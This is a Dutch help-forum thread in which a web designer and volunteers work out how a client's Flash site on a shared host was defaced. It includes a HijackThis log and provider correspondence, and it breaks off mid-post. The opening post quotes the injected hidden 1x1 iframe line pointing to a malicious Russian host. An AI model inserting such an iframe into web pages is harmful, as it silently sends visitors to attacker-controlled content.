Ben ik gehackt ... of mijn provider?

[0dd0w]

Hallo,

Aangezien een ander forum (ik noem geen namen) geen afdoende antwoord kon geven op mijn onderstaande vraag, en omdat een lid van BlueMedicine me op dit forum wees (dank Ton52), probeer ik bij jullie mijn medicijn te vinden.

Ik hoop dat ik in de goede afdeling (Firewall) post: als het probleem bij mij ligt, moet er toch 'iets' door mijn firewall gebroken zijn lijkt me.

Oké, komt-ie:
Van een klant waarvoor ik een site gebouwd heb ontving een mailtje dat er ineens ongewenst venster geopend wordt bij het bezoeken van de site. Tot mijn grote verbazing bleek inderdaad de broncode gewijzigd te zijn: mijn originele index.html van 5 juli 2006 blijkt op 19 februari van dit jaar door wie dan ook veranderd te zijn (ik was het in ieder geval niet). Onderin bleek het volgende toegevoegd te zijn:

<iframe width=1 height=1 border=0 frameborder=0 src="hxxp://wwww.pharmgame.ru/counter/client.php"></iframe>

Niet erg kwaadaardig maar toch zeeeeer ongewenst: als er aan index.html gesleuteld kan worden dan is er in ieder geval sprake van een groot lek.

Mijn webspaceprovider meent dat de fout bij mij moet liggen en dat ik m'n PC maar beter moet beschermen. Ze suggereren dat een hacker zich via mijn (met Sygate Personal Firewall Pro en NOD32 beschermde) PC de toegang heeft verschaft. Deze hacker weet blijkbaar dat ik de beheerder ben van deze site, heeft ergens mijn inlognaam en wachtwoord hiervoor opgespoord en tot slot de index.html veranderd en geupload.
Ik vind dit erg ongeloofwaardig, en op zijn minst bijzonder omslachtig. De andere sites die ik onder beheer heb zijn niet gewijzigd. Is het niet veel waarschijnlijker dat een hacker direct toegang had tot de server waar index.html op draait om het bestand daar te veranderen? En als Het Lek toch bij mij ligt, wat kan ik dan doen? Want dit mag niet nogmaals gebeuren.

Groeten en dank,
0dd0w.

[miekiemoes]

Hoi,

Dit hoeft niet perse de oorzaak zijn dat je computer geïnfecteerd werd en dat je logingegevens er af werden gehaald hoor. Kortom, zelfs al is je PC zo clean als wat.. dit kan nu éénmaal gebeuren.

Ik weet uiteraard niet in welke "taal" je websites gemaakt zijn. Maar een site kan gehacked worden op verschillende manieren.. bv, hangt ervanaf of je bepaalde scripts of taal/applicatie (vb joomla, of geschreven in php/asp) op je site gebruikt die geexploiteerd kunnen worden met dergelijke iframe injection. Dat wil dus niet zeggen dat er iets mis is met je PC.
Dit kan hier bvb ook voorvallen (php hier), maar de forumsoftware is up to date en momenteel zijn er geen lekken hier gekend.

En de laatste dagen zijn er idd massaal sites slachtoffer geworden van deze.
Meer info:
http://support.bluemedicine.be/mybb/show...p?tid=1210
http://support.bluemedicine.be/mybb/show...00#pid7300
http://ddanchev.blogspot.com/2008/03/mor...ttack.html
http://www.avertlabs.com/research/blog/i...ck-attack/
http://www.finjan.com/MCRCblog.aspx?EntryId=1905


Edit..
Trouwens, zal bovenstaande url in de coding even "uitschakelen", want je hebt hier een html code geplaatst - en gelukkig heb ik html ondersteuning hier uitgeschakeld, want dergelijke code die je hier plaatst ging anders idem iframe laden. Dus, dit in geval bij een update de html ondersteuning hier terug ingeschakeld wordt...

[0dd0w]

Hallo Miekiemoes,

Dank voor je uitgebreide reactie.

Ik lees in de links die je adviseert dat het de 'daders' vooral te doen is om passwords van games te bemachtigen. Dat is mogelijk bij mij ook het geval geweest aangezien de ilink verwijst naar pharmgame.ru: lijkt me iets met games, al bestaat die site niet eens. Hoe ze bij mij (als niet-gamer) terecht zijn gekomen, ik weet het niet.

Mijn sites bevatten niets dat exotisch is: het is een index.html dat een flashmovie oproept. De hele site bevindt zich in die flashmovie, is dus volledig html-vrij.

Blijft de vraag: moet ik mijn pc beter beveiligen (wat zorgwekkend is want lek) of moet mijn webspaceprovider de server beveiligen (wat ik niet minder zorgwekkend vind)? Oftewel: via welke ingang hebben ze die index.html bewerkt?

Groeten,
Odd0w.

p.s. excuses voor de html-code in mijn eerste tekst: kan niet de bedoeling zijn om pharmgame.ru hier te promoten

[miekiemoes]

Dus buiten de verwijzing naar het swfbestand staat er niks in de index.html?
Nu, lijkt me beter dat je me even de link van je site doorstuurt naar me via PM hier. Maar daarvoor zal je eerst een extra post in deze thread moeten plaatsen aangezien je maar pas na 3 posts een Pm kan sturen (extra beveiliging hier).
Dan kan ik even kijken hoe ze er eventueel in geslaagd zijn.

Edit... welke applicatie gebruik je om je websites te maken + up te loaden? Gebruik je de laatste versies ervan? Want dit kan ook al een oorzaak zijn. Om maar even een voorbeeld te geven: http://www.adobe.com/devnet/security/sec...04-05.html
Dit is een oudere vulnerability, sindsdien zullen er nog wel bekend zijn.

[0dd0w]

Ik gebruik (uiteraard) Flash voor het maken van de swf's. Dreamweaver gebruik ik wel regelmatig maar niet voor de site die ik je zodadelijk via PM stuur. Uploaden doe ik met Core FTP Lite 1.3c Build 1447. Inderdaad nog al een oude versie maar ja: 'never change a winning team'. Ik upload overigens ook m'n andere sites hiermee op en die hebben (tot nu toe...) nog geen last van dit probleem.

[miekiemoes]

Blijkbaar is de index.html nog altijd geïnfecteerd als ik de bestanden uit mn cache haal. met nu een verwijzing naar xxxsextour.com
Er worden toch enkele javascripts daar geladen hoor, waaronder een widget.js en een dom-common.js
Kan je even kijken in dezelfde domein directory of er daar scripts zijn die je niet kent, of daar niet geupload hebt? Want in je index.html staat allowscriptaccess="samedomain" (Permit ActionScript-to-JavaScript calls only when the SWF and HTML page come from the same domain)
Dus aangezien deze ook is toegevoegd in je parameters, veronderstel ik dat je dus ook javascript gebruikt in je flashmovie? anders moet je het zetten op "never"
Ik veronderstel dat dit dus over een remote flashmovie gaat?
Lees ook hier meer over allowscriptaccess: http://www.adobe.com/devnet/flash/articl...ty_09.html

Nu, het kan een eventuele oorzaak zijn, want ik weet niet wat er nog allemaal op die server staat.

Nu, ik denk hier eerder dat er op één of andere manier aan je login gegevens is geraakt, want deze verklaring lijkt me meer logisch. Buiten jezelf - ken je personen die je ftp info hebben? Voor hetzelfde geld kan het ook een compromise van je webhost zijn waar ze de gegevens kunnen vinden.

[0dd0w]

Het moet niet gekker worden: ik zie nu (pas) dat eergisteren (17/03 om 12.11 uur) alle vijf html-bestanden die in de root van de site staan, gewijzigd zijn en inderdaad vol staan met dat xxxsextour.com-gedoe! widget.js en dom-common.js zijn mij volledig onbekend en worden ook niet opgeroepen in de index.html. Ik kan ze op de server ook niet vinden. Zoals gezegd: de site is volledig in Flash gemaakt, geen javascript, geen PHP, geen ASP. Het enige niet-Flashfile is de index. Tenminste, dat is mijn bedoeling.
Ik kan alle originelen weer terugzetten, en ook 'samedomain' veranderen in 'never', maar weet nog niet bij wie er nou ingebroken wordt en hoe ik dit kan voorkomen.

[miekiemoes]

Citaat:k zie nu (pas) dat eergisteren (17/03 om 12.11 uur) alle vijf html-bestanden die in de root van de site staan

Om eerlijk te zijn, ik denk niet dat je pc geïnfecteerd is hoor... ik heb eerder het vermoeden dat je webspaceprovider ergens onvoorzichtig is geweest (en uiteraard zullen ze dit niet vlug toegeven)
One.com provider?

Nu, om een infectie van je PC uit te sluiten, plaats even een HijackThislog in deze thread.
* Download Trend Micro Hijack This™
Dubbelklik HJTInstall.exe om HijackThis te installeren.
Standaard zal HijackThis in de Program Files\Trendmicro map geînstalleerd worden en een snelkoppeling zal op je bureaublad komen te staan.
HijackThis zal openen na het installeren.
Klik de Scan knop onderaan.
Dit zal de scan starten en een log openen.
Kopieer en plak deze log in je volgende post.

Edit, gebruik je SSH om de files op de server te bekijken? Want gewone FTP toont niet alle bestanden.

[0dd0w]

Nou, ik had al het vermoeden dat het lek niet bij mij zit, zeker omdat ik zie dat alle vijf html-files in de root besmet zijn: vier ervan zijn niet in gebruik voor de site (enkel index.html is dat) en drie ervan zijn inderdaad van one.com zelf.

miekiemoes schreef:gebruik je SSH om de files op de server te bekijken? Want gewone FTP toont niet alle bestanden

Ik heb WinSSHD zojuist gedownload en geinstalleerd maar heb nu geen tijd om het te onderzoeken (moet naar het werk, tja). Ik doe dat vanmiddag en post dan of ik hidden files gevonden heb.

Dit is mijn log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:28:10, on 20-3-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
c:\Program Files\Hewlett-Packard\Drive Encryption\HpFkCrypt.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Intel\AMT\atchk.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\PTHOSTTR.EXE
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\SMINST\Scheduler.exe
C:\WINDOWS\system32\AccelerometerSt.exe
C:\Program Files\DU Meter\DUMeter.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
c:\Program Files\ActivIdentity\ActivClient\acevents.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
C:\Program Files\iFinger\iFinger.exe
c:\Program Files\ActivIdentity\ActivClient\accoca.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Intel\AMT\atchksrv.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\DRIVERS\CDANTSRV.EXE
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
c:\WINDOWS\system32\ifxspmgt.exe
c:\WINDOWS\system32\ifxtcs.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Intel\AMT\LMS.exe
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\Program Files\Hewlett-Packard\IAM\bin\asghost.exe
c:\WINDOWS\system32\IfxPsdSv.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\AMT\UNS.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Program Files\iPod\bin\iPodService.exe
c:\Program Files\Hewlett-Packard\Embedded Security Software\PSDrt.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Microsoft Office\Office10\OUTLOOK.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: iFinger plugin / Browser helper object - {A114D52B-870C-4F15-8021-B6D7F91A054B} - C:\PROGRA~1\iFinger\plugins\IE.ifp
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O2 - BHO: Credential Manager for HP ProtectTools - {DF21F1DB-80C6-11D3-9483-B03D0EC10000} - c:\Program Files\Hewlett-Packard\IAM\Bin\ItIEAddIn.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [SoundMAX] C:\Program Files\Analog Devices\SoundMAX\Smax4.exe /tray
O4 - HKLM\..\Run: [atchk] "C:\Program Files\Intel\AMT\atchk.exe"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /nodetect
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [SynTPStart] C:\Program Files\Synaptics\SynTP\SynTPStart.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [accrdsub] "c:\Program Files\ActivIdentity\ActivClient\accrdsub.exe"
O4 - HKLM\..\Run: [PTHOSTTR] c:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\PTHOSTTR.EXE /Start
O4 - HKLM\..\Run: [CognizanceTS] rundll32.exe c:\PROGRA~1\HEWLET~1\IAM\Bin\ASTSVCC.dll,RegisterModule
O4 - HKLM\..\Run: [IFXSPMGT] c:\WINDOWS\system32\ifxspmgt.exe /NotifyLogon
O4 - HKLM\..\Run: [HP Software Update] c:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe"
O4 - HKLM\..\Run: [IntelWireless] "C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\Sminst\Recguard.exe
O4 - HKLM\..\Run: [Reminder] C:\WINDOWS\Creator\Remind_XP.exe
O4 - HKLM\..\Run: [Scheduler] C:\WINDOWS\SMINST\Scheduler.exe
O4 - HKLM\..\Run: [WatchDog] C:\Program Files\InterVideo\DVD Check\DVDCheck.exe
O4 - HKLM\..\Run: [AccelerometerSysTrayApplet] C:\WINDOWS\system32\AccelerometerSt.exe
O4 - HKLM\..\Run: [DU Meter] C:\Program Files\DU Meter\DUMeter.exe
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [RegScanKing.exe] C:\Program Files\RegScanKing\RegScanKing.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [Gadwin PrintScreen] C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe /nosplash
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Lokale service')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Netwerkservice')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: BTTray.lnk = ?
O4 - Global Startup: DVD Check.lnk = C:\Program Files\InterVideo\DVD Check\DVDCheck.exe
O4 - Global Startup: EPSON Status Monitor 3 Environment Check 2.lnk = C:\WINDOWS\system32\spool\drivers\w32x86\3\E_SRCV02.EXE
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: iFinger 2.0.lnk = C:\Program Files\iFinger\iFinger.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - http://favorites.live.com/quickadd.aspx
O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Verzenden naar &Bluetooth-apparaat... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: iFinger - {936E5D60-596C-11D3-BB96-00600816DF55} - C:\WINDOWS\system32\SHDOCVW.DLL
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O20 - AppInit_DLLs: APSHook.dll
O20 - Winlogon Notify: ackpbsc - c:\WINDOWS\system32\ackpbsc.dll
O20 - Winlogon Notify: acunlock - c:\Program Files\ActivIdentity\ActivClient\acunlock.dll
O20 - Winlogon Notify: DeviceNP - C:\WINDOWS\SYSTEM32\DeviceNP.dll
O20 - Winlogon Notify: OneCard - c:\Program Files\Hewlett-Packard\IAM\Bin\ASWLNPkg.dll
O23 - Service: ActivClient Middleware Service (accoca) - ActivIdentity - c:\Program Files\ActivIdentity\ActivClient\accoca.exe
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Intel® Active Management Technology System Status Service (atchksrv) - Intel Corporation - C:\Program Files\Intel\AMT\atchksrv.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour-service (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\system32\DRIVERS\CDANTSRV.EXE
O23 - Service: EPSON Printer Status Agent2 (EPSONStatusAgent2) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
O23 - Service: Intel® PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: HP ProtectTools Device Locking / Auditing (FLCDLOCK) - Hewlett-Packard Ltd - c:\WINDOWS\system32\flcdlock.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Drive Encryption Service (HpFkCryptService) - SafeBoot International - c:\Program Files\Hewlett-Packard\Drive Encryption\HpFkCrypt.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: Security Platform Management Service (IFXSpMgtSrv) - Infineon Technologies AG - c:\WINDOWS\system32\ifxspmgt.exe
O23 - Service: Trusted Platform Core Service (IFXTCS) - Infineon Technologies AG - c:\WINDOWS\system32\ifxtcs.exe
O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Intel® Active Management Technology Local Management Service (LMS) - Intel Corporation - C:\Program Files\Intel\AMT\LMS.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PC Angel (PCA) - SoftThinks - C:\WINDOWS\SMINST\PCAngel.exe
O23 - Service: Personal Secure Drive service (PersonalSecureDriveService) - Infineon Technologies AG - c:\WINDOWS\system32\IfxPsdSv.exe
O23 - Service: Intel® PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel® PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Intel® Active Management Technology User Notification Service (UNS) - Intel Corporation - C:\Program Files\Intel\AMT\UNS.exe

--
End of file - 14812 bytes

[miekiemoes]

Hoi,

Ik zie alvast niks verdachts in je log hoor.

Ik weet dat Core FTP SFTP (SSH) ondersteund, maar weet niet of dit hetzelfde geval is in de lite versie die je hebt.
Kan je nergens selecteren in je Sitebeheer voor servertype: SFTP-SSH file transfer protocol?

Ik gebruik Filezilla (die gratis is) en die ondersteunt dit hoor. Als ik me niet vergis maakt het hier gebruik van PuTTY. WinSSHD ken ik niet/heb ik nog nooit gebruikt.

[0dd0w]

Ik heb even in Core FTP gekeken en inderdaad de optie gevonden om SSH/SFTP in te schakelen. Het is me alleen niet duidelijk waar dit voor dient. Want de vraag blijft: heeft het lek (zo noem ik het maar) te maken met mijn manier van uploaden of moet ik het bij m'n provider zoeken? Want als ik niet oppas verlies ik een klant die niet blij is met die porno-popups.

[miekiemoes]

Hier meer info wat betreft SSH/SFTP: http://en.wikipedia.org/wiki/SSH_file_transfer_protocol
Gebruik je die optie, dan kan je eventuele "verborgen" directories zien en bestanden. Om een voorbeeld te geven.. Ik veronderstel dat je .htaccess kent? Upload je die met de gewone FTP, dan zal je nadien, wanneer je het bestand hebt geupload dit bestand niet meer zien staan in de dir waar je het geupload hebt. Met de optie SSH/SFTP ingeschakeld zie je die wel staan.

In ieder geval heeft dit lek niet te maken met je manier van uploaden. Ik denk dat je het idd bij je provider mag zoeken, of anderen zijn die je login gegevens hebben en misschien geïnfecteerd werden geraakt en die zo hebben kunnen achterhalen.

Trouwens, ik veronderstel dat je klanten ook die gegevens hebben? Of niet? Indien zo... dan kan je het eventueel daar ook zoeken en werd hun pc geïnfecteerd waar die gegevens achterhaald werden.

[0dd0w]

Ik ben de enige die de inloggegevens van de site heeft, en beheer deze voor de klant. Kan ook moeilijk anders: het is geheel gebouwd in Flash zonder CMS en (dus) doe ik zelf het onderhoud. Er is verder niemand die de codes heeft behalve ik.

Is er nog iets anders te proberen (de Write-properties van de online files uitzetten of zo) of moet ik toch de provider nog een keer benaderen?

[Recep]

Ik kom er ook even tussen 0dd0w, maak je ook gebruik van een controlepaneel (bv. Directadmin/Plesk)? Ik herinner me dat deze logs bewaren van zo een beetje alle acties. Misschien een idee om de Apache logs even door te spitten?

[0dd0w]

Recep schreef:Ik kom er ook even tussen 0dd0w, maak je ook gebruik van een controlepaneel (bv. Directadmin/Plesk)? Ik herinner me dat deze logs bewaren van zo een beetje alle acties. Misschien een idee om de Apache logs even door te spitten?

Gezellig, meer zielen meer vreugde (en mogelijk meer oplossingen)

Oei, dat zegt me niet veel. Tot nu toe bouw ik en upload ik 'gewoon' zonder speciale extra programma's. Directadmin en Plesk ken ik niet dus er zal vast geen logbestand aangemaakt zijn. Of kan ik die ook op een andere manier inzien/opvragen?
Toen het probleem zich voordeed heb ik overigens de provider gevraagd of zij geen logfiles hadden maar zij konden niets bijzonders vinden. Kan een provider weten wie of van waaruit de upload/wijziging hebben plaatsgevonden?

[Recep]

Als je provider gebruik maakt van Apache (die kans is erg groot) dan horen ze toch wel logs te hebben..

[0dd0w]

Ik heb mijn provider vóór de paasdagen gewezen op deze thread maar ze hebben (blijkbaar wegens grote drukte) nog niet gereageerd. Hopelijk komt er iets bruikbaars uit...

[0dd0w]

De provider reageert alsvolgt:

Citaat:Geachte heer,
We hebben er naar gekeken, en helaas nog niets kunnen ontdekken. Wordt u op dit moment nog steeds gehacked? Zo ja, dan willen we u vragen dit door te geven aan ons, direct wanneer u gehacked bent. Dit aub niet aanpassen, maar aan ons doorgeven. Dan kunnen we direct kijken waar dit vandaag komt, en of de oorzaak bij One.com ligt,
of ergens anders. (we zijn niet te beroerd om eventuele schuld te bekennen).
Maar wij kunnen zonder hacks en voorbeelden moeilijk de hacker of oorzaak traceren, vandaar.
Alvast bedankt.
Met vriendelijke groet / Best Regards

Mijn reactie:

Citaat:Zojuist heb ik de vijf geïnfecteerde files (_vti_inf.html, b-one-default.html, index.html, index.dynActiveX.html en postinfo.html) ontdaan van hun ilinkverwijzingen. Hun datum en tijd van creatie is 27-03-2008 om 14.45 uur. Vervolgens heb ik mijn password van one.com gewijzigd en de bestanden geupload om 14.50 uur. Alles werkt weer en is weer schoon. Nou is het zo dat ik, van de vijf bovengenoemde bestanden, er slechts één in gebruik heb, te weten index.html. En ik wijzig dit bestand zelden of nooit. Het is voor mij erg omslachtig om elke dag te controleren of deze index
